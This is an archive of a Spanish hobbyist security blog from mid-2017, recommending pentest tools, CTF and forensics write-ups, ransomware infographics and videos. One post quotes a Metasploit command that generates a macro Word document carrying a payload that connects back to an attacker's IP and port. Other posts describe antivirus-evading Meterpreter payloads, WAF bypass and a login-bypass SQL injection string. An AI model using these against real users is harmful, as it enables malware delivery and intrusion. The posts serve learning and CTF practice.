miércoles, 19 de julio de 2017

CYBERPUNK SUMMER 2017 (0).- The Pocket CHIP

Este año se nos ha juntado un montón de tecnología de que que queremos disfrutar este verano. Así que durante el mes de agosto realizaremos una serie de vídeos llamados CYBERPUNK SUMMER jugando, modificando y en fin, disfrutando con la tecnología que para algo la tenemos. Además de servirnos para mejorar la calidad de los vídeos del canal de youtube y de ser una especie de master en edición de vídeo que ya nos hace falta. 

Contenido de esta serie: 
  • The Pocket CHIP
  • Moding para Pocket CHIP (Carcasa 3D, leds, etc)
  • War Driving with airodump-ng
  • The Drone
  • Emuladores
  • Hacking variado e improvisado. 
Así que, os dejo con el vídeo numero 0 donde os presentamos la [Pocket CHIP] un micro pc de 69$*(mas gastos de envío y aduanas) que como vais a ver tiene sus pros y sus contras. 


Sed Buenos ;)

martes, 18 de julio de 2017

Vídeo.- pancake, radare & ARM

La ingeniería inversa es algo que se me atraganta mucho y si alguien tiene algún truco que me pueda ir bien para aprender os lo agradecería mucho. También quiero aprender como funciona radare así que en cuanto veo un vídeo de Sergi ‘pancake’ Alvarez no puedo evitar verlo y recomendaroslo aunque esta vez no lo podáis ver desde el blog. 


Sed Buenos ;)

lunes, 17 de julio de 2017

mini-tor.- TOR fácil y con solo a 20kb.

Ya sabéis mi tremenda devoción por el software minimalista y si ademas lo juntas con la red TOR, me sobra tiempo para compartirlo y pensar como crear el mio propio (En perfecto Python Of course). 


Como su nombre indica mini-tor, es una prueba de concepto que nos permite abrir cualquier contenido o web .oninon a través de la red tor con comando muy simple.
  • mini-tor.exe "webalaquequierasacceder" 

Fácil, cómodo y para toda la familia. Ademas es una idea muy chula pera "tunearla", os dejo el enlace al GitHub.
Sed Buenos ;) 

domingo, 16 de julio de 2017

HackThis Crypto 3 - -- --- .-. ... . .-.-.

Hoy es domingo y toca vídeo. Así que, seguimos con los retos de Criptografia y hoy toca morse. Muchos no sabemos ni escribir SOS pero Kazukun nos muestra como podemos descifrar código morse en pocos pasos y con esto resolver el tercer reto de criptografia de HackThis.

 

Sed Buenos ;)

viernes, 14 de julio de 2017

[Vídeo].- How Tor Users Got Caught

Mi devoción por la Defcon vino a raíz [que me tragué todo el documental] que sacaron los organizadores de este congreso por su 20ª edición. Por eso siempre voy rapiñado vídeos de aquí y allí. Así que hoy me encanta recomendaros una ponencia donde se exponen varios casos de usuarios de red tor que fueron y de porqué fueron pillados al hacer maldades. 


Sed Buenos ;)

jueves, 13 de julio de 2017

Infografia.- Así se propaga el Ransomware

Nunca está de mas repasar los métodos que tiene este malware de moda para propagarse y que podemos hacer nosotros para pararlo o al menos para estar alerta para no caer en sus redes. Pues que mejor manera de hacerlo que con una infografia. 


Sed Buenos ;)

miércoles, 12 de julio de 2017

Winpayloads .- Python y la generación de Payloads.

Esta vuelve a ser una entrada para mi yo de aquí unas semanas cuando esté de vacaciones y pueda jugar con tranquilidad con mi [Pocket C.H.I.P]  este gadget corre sobre un debian al que le puedes instalar casi de todo.  Así que y como me gusta la seguridad informática, ¿Por que no probar herramientas como Winpayloads?. 

Winpaylods es una herramienta que genera payloads que utiliza el  meterpreter shellcode de metasploits, inyecta la  ip y puerto de los usuarios en el shellcode y escribe el archivo python que ejecuta el shellcode usando ctypes. Esto se cifra (AES) y se compila a un ejecutable de Windows utilizando pyinstaller.

Pero aunque al principio estos payloads eran indetectables, ya han subido algunos a virustotal y a día de hoy solo los detectan 8 marcas de antivirus. (Enlace sacado de su GitHub)
Muy chulo verdad, pues con un USB conectado al bicho mola mucho mas. Aquí tenéis un vídeo que muestra como funciona: 


Enlace a la herramienta: 

Muchas gracias,

Un saludo.

martes, 11 de julio de 2017

Python.- Remove Exif Data

Ya sabéis que los metadatos es algo de lo que [hemos hablado largo y tendido] y la verdad es que nunca me canso.  Así que cuando veo herramientas relacionadas con Exif no puedo evitar compartirlas.  


Remove Exif Data With Ease es una herramienta escrita en Python 2.7 y pasada por el [Py2exe] para crear un ejecutable para Windows (vamos un .exe). La cual es capaz de eliminar todos los metadatos de todas las fotos que tengamos en una carpeta creando un duplicado sin esta información y dejando la original. 

Enlace al GitHub: 

Sed Buenos ;) 

lunes, 10 de julio de 2017

VimGameCodeBreak.- Borrando código con estilo.

Seguro que habéis programado algo y que os han entrado ese picorcillo al notar que vuestro código no funcionaba. La verdad es que si esto pasa con un editor de código "amigable" imaginaros si estáis usando vim por eso johngrib se lo ha tomado por el lado ZEN y ha creado una copia del videojuego de Arkanoid que se ejecuta como un plugin de vim y al impactar contra una linea de código, esta desaparece. 



Simplemente brutal y grande a la vez. Me ha encantado. Aquí tenéis el enlace a su repositorio: 
Muchas gracias, 

Un saludo 

sábado, 8 de julio de 2017

Hobbytrucos.- Volatility (I)

Lo prometido es deuda y como ayer no hice entrada la cambiamos por el parón de los sábados aunque esta este programada . Bueno,  prometí compartir mis hobbytrucos para la CTF que tenia hoy (aunque haya quedado último) pero creo que será esta información os gustará y me ayudará a mejora.


Trabajar con registros en Volatility: 

  • Para ver las hives cacheadas, grupos lógicos de keys, subkeys, y valores en el registro.
    •  volatility -f random.dmp --profile=profile hivelist
      • Con este comando podremos ver donde empieza y donde acaba cada hive
    •  volatility -f random.dmp --profile=profile printkey -o iniciodeloffset  -K 'rutaenlosregistros'
      • Con este comando podremos "navegar entre las key y las subkeys de una hive en busca de los valores que nos interesen. 
Extraer un dmp de un proceso que nos interese de una imagen raw con Volatility:

  • Primero deberíamos ver el arbol de procesos del raw por si hubiera alguno que nos interesara:
    • volatility -f random.raw pslist --profile=profile pstree
  • Una vez hemos encontrado el proceso que nos interesa nos quedamos con el Process identificator (PID) y usamos el siguiente comando para guardar un .dmp en /root/ para luego jugar con el: 
    • volatility -f random.raw --profile=profile memdump -p 4092 -D /root/
Sed Buenos ;) 

jueves, 6 de julio de 2017

Infografia.- WannaCry VS Petya

Después de unos cuantos días después del segundo "ciber-ataque mundial" mucho se ha hablado de los parecidos con WannaCry pero hay algunos mitos que debemos aclarar. Para eso esta inforgrafia tan chachi sobre las diferencias entre Petya y WannaCry. Muy recomendable. 


Sed Buenos ;)

miércoles, 5 de julio de 2017

CTF.- Algunos Write Ups curiosos sobre Forensics (II)

Si hace unos días os recomendé algunos Write Ups en forma de blogs hoy me gustaría centrarme en vídeos. La verdad es que me he podido apuntar pocos hobbytrucos  así que no se si os lo compartiré o no, dependerá de si me son útiles el viernes. Pero, espero que con estos vídeos me quede claro donde he de empezar a mirar y como. 

Para empezar, aquí tenéis un truco muy chulo con imágenes donde una de ellas está oculta y no vale solo con la parte técnica si no que encima tienes que saber de aeropuertos:


Otro que nos muestra como extraer un archivo .avi de un pcap en Wireshark debido a una llamada por VoIP:


Y el último un amplio y muy recomendable repaso a Volatility: 


Sed Buenos ;) 

martes, 4 de julio de 2017

Python Loves Pentesters

Arrodillaos ante el poder de Python y ante su sencillez.  El no os hará llorar y os facilitará vuestros pentests. Bueno,  broma aparte del momento evangelizador, hoy me he encontrado con un recopilatorio de herramientas y librerías en/para Python que no defrauda para nada, si que están las mas famosas pero al estar divididas por "áreas" han puesto algunas librerías y herramientas que yo no conocía.


Así que me lo guardo para trastear con ellas en un futuro. Aquí tenéis el link: 
Muchas gracias, 

Un saludo. 

lunes, 3 de julio de 2017

CTF.- Algunos Write Ups curiosos sobre Forensics (I)

Este viernes por la tarde me han convocado a una CTF orientada al campo Forense. Así que he decidido ir recopilando información y Hobbytrucos (los comparto después de la CTF si me dan buen resultado) para que al encontrarme con el reto, al menos las situaciones me suenen. 


El primer write up nos muestra como tenemos que trabajar si nos encontramos un .Pcap en el sistema: 

El segundo y el tercero nos muestran como trabajar con volatility y process dump para extraer una imagen del proceso de paint, curioso y la verdad es que no tenia ni idea: 
Y el cuarto, es un recopilación de entradas de los grandes de Security Art Work donde juntan estas técnicas y les dan tres vueltas para solucionar una CTF muy complicada. 
Sed Buenos ;) 

domingo, 2 de julio de 2017

HackThis Crypto 2 - Al Cesar lo que es del Cesar

Hoy es domingo y toca otro reto orientado a la criptografía, esta vez un poco mas complicado pero si investigamos bien veremos que el cifrado cesar puede ser fácilmente descifrable.

Más información sobre el cifrado Cesar:

Por eso Kazukun nos muestra como solucionar este reto y una herramienta que nos ayudara a saber el contenido de este mensaje cifrado.




Sed Buenos ;) 

viernes, 30 de junio de 2017

Vídeo.- Malware Analysis Petya

Ya han pasado unos cuatro días desde el susto de Petya y ya hay mucha información técnica hablando este Ransomware. Pero para mi uno de los puntos mas cojos es el análisis de malware pero lo voy entendiendo gracias a vídeos como el que os voy a recomendar hoy.

Si os quisierais poner a analizar Petya a alto nivel así tendríamos que empezar.


Sed Buenos ;)

jueves, 29 de junio de 2017

Hobbytruco.- Nmap y resolución inversa de DNS

La verdad es que a veces me dejo llevar por Python y mas desde hace unos días me entere que el videojuego [Eve online está programado en una versión tuneada de Python] llamada Stackless Python. Pero, es verdad que muchas veces me pongo a programar script sencillos para que hagan acciones que se podrían hacer con herramientas que tenemos al alcance y esto está muy bien para aprender pero también es una perdida de tiempo para vosotros y para mi. 


Por eso,  hoy a parte de compartir con vosotros un script para realizar la resolución inversa de DNS de una lista de ips, voy ha empezar con la seria Hobbytruco donde siempre que yo (o vosotros pero es mas para mi día a día) necesite algo pueda recurrir a este blog a encontrar el truco o la explicación correspondiente. 

Por cierto, aquí tenéis el enlace de mi POC para la resolución inversa donde se utiliza socket.gethostbyaddr(ip_address) de la librería socket para que nos devuelva el hostname: 

Muy chulo y didáctico pero esto mismo nos lo puede hacer nmap con un simple comando 
  • nmap -iL ips.txt -sL -oA archivoenelquequieresguardarlo

Donde las opciones son las siguientes: 
-iL <archivo>: Se pasan los objetivos en un fichero, cada uno en una línea
-sL: Es el encargardo de hacer la resolución inversa a las IPs del archivo.
-oA: Crea un fichero para los tipos de salida normal, XML y otro igual que la normal pero que a favorece al comando grep.

Sed Buenos ;)

miércoles, 28 de junio de 2017

Payloads All The Things

Hoy ha costado mucho encontrar algo curioso que publicar que no esté relacionado con [Petya] (El heredero de WannaCry) pero creo que el repositorio del estudiante de ingenieria [Swissky] que os voy a recomendar hoy, lo vale. 


Payloads All The Things como su nombre indica es una recopilación de payloads y bypasses para testear la seguridad de aplicaciones Web y la verdad es que es bastante completo. 

Para los que no sepáis que es un Payload os engancho una versión "tuneada"  de la wikipedia: 

Enlace al GitHub de Payloads All The Things: 
Sed Buenos con esto 0;) 

martes, 27 de junio de 2017

XSStrike.- Fuzz and Bruteforce

Python es amor, Python es alegría y como creyente radical de este lenguaje de programación que me he vuelto durante este último año, no puedo evitar sorprenderme al ver que cada día aparecen mas herramientas relacionadas con la seguridad informática. 

Hoy le toca el turno a XSStrike una herramienta que nos permite [Fuzzear] y hacer fuerza bruta de parámetros para encontrar vulnerabilidades XSS (cross site scripting) pero, antes de lanzar todo su arsenal, es capaz de detectar si hay un WAF (Web Application Firewall) y evitarlo. 


Ademas: mola un monto, tiene colores y es fácil de instalar gracias a la magia de pip install -r requirements.txt


Enlace a la GitHub de la herramienta: 
Fuente de la noticia y mucha mas información: 

lunes, 26 de junio de 2017

Vídeo.- mindreader Google CTF 2017

Siempre se aprende de ver a alguien solucionar una CTF, no tanto como jugando con ella pero si aun no nos atrevemos a entrar en el mundo de las CTFs o nos hemos atascado mucho y estamos hasta los mismísimos del [Try Harder]. 

Toda esta introducción viene a razón de que revisando la CTF de Google 2017 no tenia ni idea de porqué se utilizaba /dev/fd/ para poder acceder al archivo environ usando /dev/fd/../environ. [Ahora ya lo se], pero quiero recomendaros el vídeo de LiveOverflow del cual tengo que aprender un montón y ha hecho que me ponga a buscar muchas mas información. 


Sed Buenos ;) 

domingo, 25 de junio de 2017

HackThis Crypto 1 - Le juro agente que la pass estaba al revés

Domingo, sol, calor y vídeo. A Kazukun ya se le está quedando corto Hackthis y ya nos hemos acabado todos los retos de SQL. Así que, ahora toca darle fuerte a todos los de crypto aunque es bastante fácil. 

Ya veréis.


 Sed Buenos ;)

viernes, 23 de junio de 2017

Paper.- Tempest ataca de nuevo contra AES-256

Para los que no sepáis que es un ataque Tempest, es el espionaje de los sistemas de información a través de fugas de emanaciones, incluyendo señales, sonidos y vibraciones de radio o eléctricas.
 

Para mi, hace mucho que no oía hablar de los ataques Tempest y pensaba que era algo relegado al pasado pero veo que no, Ahora han vuelto y con mas fuerza y fastidiando al algoritmo AES-256.

Enlace al paper:
Sed Buenos ;) 

miércoles, 21 de junio de 2017

Slides.- ZAP vs BurpSuite

Siempre me he preguntado cuando valía la pena usar BurpSuite o ZAP ya que par mi eran herramientas muy parecidas. Hoy quiero que os quedéis con las Slides 9, 10 y 11 de la siguiente presentación y veréis que donde no llega una llega la otra. 


Así que esto me ha abierto un poco mi cabeza llena de serrín y ya que me voy a poner a repasar las diferencias entre BurpSuite y Zap quiero recomendaros dos guías del amigo Snifer donde nos muestra como utilizar debidamente estas herramientas. 


Sed Buenos ;) 

martes, 20 de junio de 2017

Vídeo.- Whatsapp y El abusón de las features

Ya he recomendado por aquí alguna charla de [Daniel Martinez] pero hoy me ha asustado y tengo algunas preguntas que espero que me respondáis en los comentarios. La charla que dio Daniel en la ROOTED CON 2016 sobre Whatsapp donde demostraba que las fotos y los vídeos que compartimos son subidos a sus servidores y se nos muestran a través de una URL. 


Una vez visto el vídeo, aquí ve mi pregunta. Entendiendo que el el cifrado End to End llego sobre el día 6 de Abril del año pasado y que la charla se dio en los días 3, 4 y 5 de Marzo de 2016  ¿Alguien sabe si ahora estas imágenes o vídeos van cifrados?  Entiendo que si, al igual que hará telegram. Pero si lo confirmáis me quedo mas tranquilo y reinstalo el Whatsapp. 

Sed Buenos ;) 

lunes, 19 de junio de 2017

Herramienta.- Pwnbox

Los [contenedores Docker] se han venido para quedarse y cada vez me sorprende mas sus  aplicaciones. Por ejemplo [Harold Rodriguez] lo ha aplicado a algo que nos gusta a todos que son las CTFs (Capture The Flag),


Pues Pwnbox es un contenedor Docker que contiene varias herramientas para el reversing de binarios y para su explotación.  Una pasada pero un poco difícil de instalar, aunque en el GitHub encontrareis como hacerlo paso por paso. 

Enlace a la herramienta: 


Sed Bueno ;)

domingo, 18 de junio de 2017

Vídeo.- HackThis SQL 2 - Query que te Query

Hoy es Domingo  por lo que toca vídeo y en este reto, si que Kazukun se ha tenido que estrujar la cabeza y aprender un poco de peticiones SQL antes de realizarlo. Pero, espero que aprendáis todos que, con un poco de estudio y de preparación se puede aprender y solucionar retos tan divertidos como este.


Sed Buenos ;)

viernes, 16 de junio de 2017

Vídeo.- Universal Radio Hacker

Ya sabéis que llevo tiempo mirando la mejor manera de introducirme en el mundo del Software Defined Radio (SDR) así que me he quedado a cuadros al ver la siguiente herramienta y de conocer que su creador [Johannes Pohl] sube vídeos a Youtube enseñando como usarlas. 

Os dejo con el vídeo que merece mucho la pena: 


Y aquí está el enlace a la herramienta, tendréis que pegaros un poco con las dependencias, pero vale la pena. 

Sed Buenos ;) 

jueves, 15 de junio de 2017

SSHCheck .- Revisa tus conexiones SSH

Muchas veces no conectamos por SSH a nuestros equipos sin revisar correctamente si la conexión es segura o no. Por eso hoy os recomiendo SSHCheck, una aplicación web donde podemos auditar cualquier IP o Hostname que nos sepamos sin necesidad de abrir nuestro Nesus, OpenVAS o Nexpose.


Ademas la info que da es bastante completa sobretodo a lo que cifrados algoritmos de cifrado. Lo mira todo (claro está que no se pondrá a comprobar contraseñas por defecto) . 

Enlace a la la herramienta: 
Sed Buenos ;) 

miércoles, 14 de junio de 2017

Vídeo.- Historias para no dormir

Hoy me he levantado con ganas de ver ponencias y me he acordad del bueno de Lorenzo Martinez.  Así que me he puesto a buscar ponencias y después de un tengui tengui falti tuneado a visto visto no visto,  he visto por twitter que habían publicado su charla en el Mundo Hacker Day 2017 así que me he puesto a verla. 

La verdad es que me esperaba una charla sobre forense sobre rusos, no se porque, pero me he encontrado con un muy buen repaso a APT famosas que han ido surgiendo en los últimos años. Muy recomendable. 


Sed Buenos ;) 

martes, 13 de junio de 2017

CheatSheet.- Data Science in Python

Bueno, cada día que pasa parece que este blog se encamina a ser unicamente de Python pero es que cada vez me sorprende mas este lenguaje de programación. Hoy, aunque no os recomendaría Python para esto, os recomiendo esta "chuleta" sobre PANDAS (No, los osos no ...) una librería construida sobre Numpy para la  estructura y el análisis de datos. 


Inforgrafia en grande y mucha mas información: 

Sed Buenos ;)

lunes, 12 de junio de 2017

Filtrar información desde los LEDs de tu router.

Esto me ha parecido un pasada. Ya no podemos fiarnos ni de los LEDs de nuestro router gracias al buen trabajo de la gente de Negev (Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici). 

Estos señores se dedicaron a relacionar la información que pasa por un Switch o un router con los leds de estos dispositivos con el fin de grabar la secuencia con una cámara remota o con un sensor óptico. No será muy rápido, pero como mínimo es muy curioso y merece que os leáis el Paper.


Enlace al paper: 
Sed Buenos ;) 

domingo, 11 de junio de 2017

HackThis SQL 1 - 'or'1'='1

Hoy es domingo y toca vídeo de HackThis, aunque este reto ya salió en el apartado de basics de esta página de retos pero nunca está de mas recordar que 'or'1'='1 te pude abrir muchas puertas si el programador de turno no ha hecho bien su trabajo.

Sea como sea, hoy Kazukun nos muestra como pasarnos el primer reto del apartado SQL Injection de HackThis .



Sed Buenos ;)

viernes, 9 de junio de 2017

PDO.- Python + Have I been pwned?

Hace mucho que tenia esta idea en la mente. ¿Por qué no me creo un script en Python que consulte a [Have I Been Pwned] (la página esa para ver si tus pass han sido filtradas por algún lado) para que cada día revise si me han Pwneado?

Pues nada me puse a mirar la página y vi que el servicio de Notify me! en el que te avisan por correo si tu contraseña ha sido filtrada no me convencía, pero al ver el apartado API vino la luz de la inspiración.

Solo hace falta consultar la siguiente URL substituyendo {account} por la dirección de correo que queráis buscar y ya lo tenemos:
  • GET https://haveibeenpwned.com/api/v2/breachedaccount/{account} 
Por lo que lo tenia fácil para preparar mi script en python  así que para jugar primero cree a GAS. Un script que permite buscar cualquier cuenta y te devuelve la confirmación de que estás jodido y las fuentes donde los malos pueden encontrar tu pass. 

Ejemplo de GAS: 


Así que, una vez ya programado GAS lo modifique para crear a PDO (Powned Daemon Oriented) y esta ya podía consultar todas las cuentas de correo que le añada a un txt. Pues esto, fusionado con programarlo para que se ejecute cada vez que abro el equipo ya tengo lo que veníamos a buscar. 
 
Cada día al encender el PC el script monitorizará por mi si mis pass están al alcance de todo Internet y eso me tranquiliza un poco

Ejemplo de como funciona PDO:

 

Es una idea loca y fácil, pero me ha molado hacerla. Aquí tenéis el enlace a mi GitHub para que podáis jugar con los scripts:

Sed Buenos ;)

jueves, 8 de junio de 2017

StateX.-Las gracias a quien hay de dárselas

Siempre empiezo mis entradas con una mención al día con termino como por ejemplo: Hoy, ayer, es Viernes ... y la verdad es que me gusta. Bueno, mas bien ya me he acostumbrado a ella y creo que se adecuan bien a mi manera de escribir en este blog.  Vamos, que improviso un montón.


Esta entrada está un poco mas preparada que las demás ya que en esta semana y estamos a jueves, han pasado unas cuantas cosas de las que os tengo que estar agradecido  a vosotros, mis lectores.

Vamos por puntos:
  1. Gracias a todos los que aportáis valor a este blog con vuestros comentarios, entradas, noticias, imágenes e ideas. (Ya sabéis todos quien sois)
  2. Gracias a los que apoyáis a Tonto ... No me esperaba que a la gente le gustara  tanto y que ahora estén aportando ideas en el [foro]. 
  3. Gracias a todos los que me corregís. La verdad, jode pero se aprende mas y aveces pasa cosas muy chulas. Por ejemplo ayer el bueno de Snifer me corrigió con el tema de para que servia RHost y LHost de metasploit y al final acabamos haciéndole una pregunta al creador de la entrada que recomendaba. Así aprendimos. 
Y ya está, en esta semana me habéis ayudado mas que en años y eso es de agradecer. Este blog se creó con la necesidad de aprender muchas cosas sobre este mundo. Hasta hemos pasado por bastantes estados: Un síndrome de  Diógenes digital al acumular documentos, frustración por no poder leerlas todas, aprobamos el CEH y como no por momentos de euforia y de días malos.

Nunca he tenido mas reputación de la que me habéis dado vosotros y espero que sigáis así aportando, ayudando y corrigiendo. Os lo agradeceré siempre y me gustaría, quizás, en un futuro, deje de llamaros lectores y pueda llamaros comunidad.

Sed Buenos ;)

miércoles, 7 de junio de 2017

Metasploit.- Paso a paso.

Hace mucho que no toco Metasploit, miento el otro día lo abrí para ver si estaba el mítico exploit de samba pero no mucho mas, pero con la que está cayendo últimamente no solo tendría que empezar a refrescar Ruby si no también Metasploit. 


Por eso y ya que voy a refrescarlo esta tarde, os dejo con la guía Step by step Metasploit del blog zero-day.io donde no solo hacen una repaso al famoso framework si no que ademas te explican la fase de reconocimiento con un par de herramientas famosas también y se para a explicar por que debemos utilizar Rhost cuando estamos lanzando un exploit desde fuera de nuestra red y Lhost cuando la maquina victima esta dentro. Muy recomendable. 

Enlace a la guía: 
Sed Buenos ;) 

martes, 6 de junio de 2017

Antivmdetection.- Analiza Malware tranquilamente.

Hemos hablado mucho sobre [que tipo de información buscaba un Malware] para descubrir si está corriendo en una máquina virtual y de esta manera cambiar su manera de actuar para que no podamos descubrir que hace. Por eso, Mikael Keri ha creado un script para preparar nuestro Windows para que podamos analizar el bicho tranquilamente sin que mute a un proceso inocuo.


Muchas mas información y enlace al GitHub:

Aprovechadlo antes de que los malos modifiquen sus códigos para saltarse esto también. 

Sed Buenos ;) 

domingo, 4 de junio de 2017

HackThis Javascript 5.- Devuélveme la pass 2 la venganza

Domingo, vídeo y manta ya que por aquí llueve un poco y se está la mar de a gusto. Bueno, otro error típico en Javascript,  esta vez estaba un poco mas escondido pero en linea con el Javascript 3 Kazukun consigue obtener la pass de este reto mediante la invocación del comando alert().

Esperemos que os guste: 


Sed Buenos ;) 

viernes, 2 de junio de 2017

Vídeo.- Bienvenidos a Hackerville

Esto ha sido un rumor en mi casa desde que empezamos a trastear en el mundo de las seguridad informática, un pueblo lleno de hackers haciendo barrabasadas todo el día nos parecía super guay  ... no sabíamos nada pero la curiosidad de lo que se hace en este pueblo de Rumanía siempre me ha intrigado.  

Así que hoy os recomiendo este vídeo que han compartido en el grupo de Facebook de Hackstory para que como yo hace unos años descubráis que no es tan guay, ni chulo como parece. 


Sed Buenos ;)

jueves, 1 de junio de 2017

Infografía.- Vectores de ataque de la Ingeniería Social

Hace un par de días que los he dedicado a algo muy parecido a la ingeniería social y quieras o no, si trabajas en este mundo, no puedes evitar extrapolarlo para hacer el mal. Por eso ayer os compartí el vídeo de Google y hoy os vamos a ver los diferentes vectores de ataque que tiene la ingeniería social para que nada pueda sorprendernos. 


Más información y fuente:

Sed Buenos ;)

miércoles, 31 de mayo de 2017

Vídeo.- Google: Cómo evitar ataques de ingeniería social

Ya sabéis. que al final por mucho que aseguremos nuestras máquinas el mejor antivirus somos nosotros mismo. Por eso debemos estar formado y atentos a cualquier tontería que veamos o detectemos como sospechosa.

Google lo sabe y por eso ha publicado algunas claves para concienciarnos de las amenazas y ver como tenemos que reaccionar para solucionarlas.


Sed Buenos ;) 

martes, 30 de mayo de 2017

Proyecto.- Pray for tonto

Para los nuevos que leéis este blog Tonto es un asistente virtual que empecé a programar para aprender Python y que poco a poco ha ido tomando forma. Pero ya hace meses que no he escrito ni una linea de su código justo cuando cree el foro Pray for Tonto para que la gente que me enviaba recomendaciones y pedía consejo se pudieran responder los unos a los otros y de esta manera jugar con la tecnología, que es lo que nos gusta al fin y al cabo. 

Pero al ver que casi nadie aportaba, al final, me olvide de ella hasta que recibí en mi inbox, el siguiente mensaje: 


Además de tocarme muy fuerte la "patata", habían varias ideas chulas en los hilos, así que creo que la poca colaboración que ha habido se debe a que no he movido el tema ya que la gente quiere colaborar. 


De esta manera ahora tendremos el siguiente muñeco a la derecha del blog por si queréis colaborar y yo me comprometo a aportar mas valía a este foro. 

Enlaces para que los que no sepáis que es Tonto:

 Sed Buenos ;) 

lunes, 29 de mayo de 2017

PRET.- No mires la basura mira a tu impresora.

Por si no lo sabéis en muchas empresas la basura se trata de una manera diferente a lo que estamos acostumbrados nosotros en casa. Esto es debido a que se trata con información sensible o de importancia y no queremos que un tipo, rebuscando en la basura, obtenga dicha información.  A esto se le llama dumpester diving, pero lo que ahora está de moda es escarbar en tu impresora. 


PRET es una herramienta que nos permite descubrir las impresoras conectadas a nuestra red y explotarlas para que nos devuelva y además el usage es simple. ¿Qué mas podemos pedir?

  • usage: pret.py [opcion] target {ps,pjl,pcl}

Mucha mas información y link al repositorio de la herramienta: 
Sed Buenos ;) 

domingo, 28 de mayo de 2017

Vídeo.- Una invitación para HackTheBox

Hoy es domingo y toca vídeo. Pero quiero pararme un poco a explicaros que es HackTheBox y por que mola el capítulo de hoy.

HackTheBox es una pagina dedicada a probar técnicas relacionadas con pentesting e intercambiar ideas con la gente de su comunidad. Pero lo que mas me gusta es que has de hackear la página para encontrar la Key de invitación que te permita registrarte en ella. 

Os pego el enlace aquí abajo y si realmente queréis intentarlo no os miréis el vídeo hasta que no os sea necesario: 
Hace mucho nos dijeron que esto de ver el código fuente de una página no servia para nada. No dejan de tener parte de razón pero no deja de ser una de las principales técnicas que tiene un Hacker para trastear con páginas web.

En este caso Kazukun nos muestra como loguearnos en la pagina de "retos" Hack The Box la cual has de hackear para poder obtener una invitación.

Esperamos que os guste:



Sed Buenos ;)  

viernes, 26 de mayo de 2017

Vídeo.- Raspberry + TOR

Creo que este "artefacto" es uno de los primeros que debería tener alguien que le mole cacharrera con la seguridad informática. Es fácil de montar si no se te va mucho la cabeza probando cosas, es útil y aprendes un montón sobre configuraciones de linux y de tor. 

Además en este vídeo lo explican genial y hay un tío vestido de cura, que mas podemos pedir. 



Sed Buenos ;) 

jueves, 25 de mayo de 2017

Infografia.- Como funciona Wannacry paso por paso

Como buen curioso de este mundo, saber como actuaba el Ransomware de moda en las últimas semanas ha sido mi perdición así que si tenis la misma curiosidad que yo os va encantar esta infografia donde se muestra paso por paso como funciona este malware. Con pelos, señales y hasta el boletín que tendríais que tener instalado. 


Sed Buenos ;)

miércoles, 24 de mayo de 2017

Microsploit.- Trasteando con Office y Metasploit.

La verdad es que no se muy bien como calificar a este script pero la verdad es que es una buena herramienta si quieres trastear con documentos Office maliciosos. No se si os pasará a vosotros pero metasploit se me hace un poco pesado a la hora de trabajar con el, sobretodo si no tienes muy claro que exploit en concreto estas buscando por eso Microsploit mola. Gracias al menú podemos seleccionar que tipo de bicho queremos y el script por si solo interectua con metasploit y nos genera  el documento con macros en la carpeta output.


Ejemplo de como actúa el script con metasploit: 

"$msfconsole -x 'use exploit/multi/fileformat/office_word_macro; set payload $payloads ; set FILENAME $fira.docm; set BODY $bodys; set lhost $yourip ; set lport $yourport; set target 1; exploit; exit -y'" 
echo "" 
mv ~/.msf4/local/$fira.docm $path/output/$fira.docm

 Recomendable, pero siempre sabiendo lo que se está haciendo (aquí se ha hablado mucho sobre word con macros) y se necesitarán unas nociones básicas de metasploit.

Enlace al GitHub:



Sed Buenos ;)

martes, 23 de mayo de 2017

Aprendiendo Bluetooth Hacker MODE :ON

Ayer en el metro, mientras escuchaba música, me puse a mirar a toda la gente que estaba embobada mirando su smartphone y pensé en cuantos de ellos tendrían el Bluetooth activado por defecto y en lo que podría hacer si supiera tanto como [Pablo F. Iglesias] pero como aun no, por algun lado tendré que empezar. 


Así que, cual ha sido me sorpresa al encontrarme con el Git Hub de [Brando Asuncion] donde le ha hecho ingeniería inversa al protocolo de la manera mas Hacker que se me ocurre. Brando se ha creado un script que emula ser un radar de dispositivos bluetooth, ha escuchado la salida con Wireshark y después ha recopilado toda la información sobre la petición y la respuesta en su repositorio.

Muy recomendable y bien explicado, ademas tenéis los script que ha usado para reproducir el experimento: 



Sed Buenos ;) 


lunes, 22 de mayo de 2017

MS17-010 Usado para minear Monero

Si os pensabais que a nadie mas se le había ocurrido usar Eternal Blue ibais muy equivocados. Proofpoint analizando WannaCry descubrieron una clase de Malware (llamado Adylkuzz) que usaba EternalBlue y DoublePulsar para instalar de manera masiva un minero de la criptomoneda Monero. Se calcula que ha tenido un alcance parecido al famoso Ransomware pero, como no da un mensaje de alerta pues no ha saltado a la luz pública.


Hoy os recomiendo el post de proofpoint donde explican como lo descubrieron y como lo destriparon. No os voy a explicar mucho mas ya que espero que os lo leáis.  Merece la pena: 

domingo, 21 de mayo de 2017

HackThis Javascript 3.- Devuelveme la pass

Domingo y hoy toca ver la solución al tercer reto de Javascript en HackThis. Javascript mola mil pero siempre y cuando hagamos las cosas bien. así que no dejemos las pass harcodeadas en el código ya que es muy fácil llamar con un alert() a la variable en la que está metida la pass. De esta manera Kazukun nos muestra como solucionar el tercer reto de Javascript en HackThis.

Sed Buenos ;)

viernes, 19 de mayo de 2017

Vídeo - La Brecha Digital - Cifra tu mundo

Viernes y hoy toca vídeo para desgrasar de tanta actualizad y de tanto Wannacry pero que nos permita estar alerta y de como reaccionar para blindarnos en la red de red. 
Tor, VPN, VoIP segura, Seguridad WiFi, Cifrado de Archivos para almacenar en la nube, uso de una raspberry pi para limpiar el unidades USB sospechosas, sistema operativo seguro Qubes OS y más.

Espero que os guste y que os sirva como a mi para interesaros un poco mas en este mundo.



Sed Buenos ;) 

jueves, 18 de mayo de 2017

Infografia.- El Balance de WannaCry

Bueno, después de casi una semana con la resaca del WannaCry me he preguntado cuanta gente a pagado o cuanto es el daño que ha causado. Así que ha sido una sorpresa que el ABC haya sacado una infografia donde hacen el recuento por nosotros.  No se bien bien de donde han sacado todos los datos pero en términos generales me sirve para hacerme una idea y creo que a vosotros también. 


Sed Buenos ;)

miércoles, 17 de mayo de 2017

Podcast.- Podcast Dame una Shell - 2

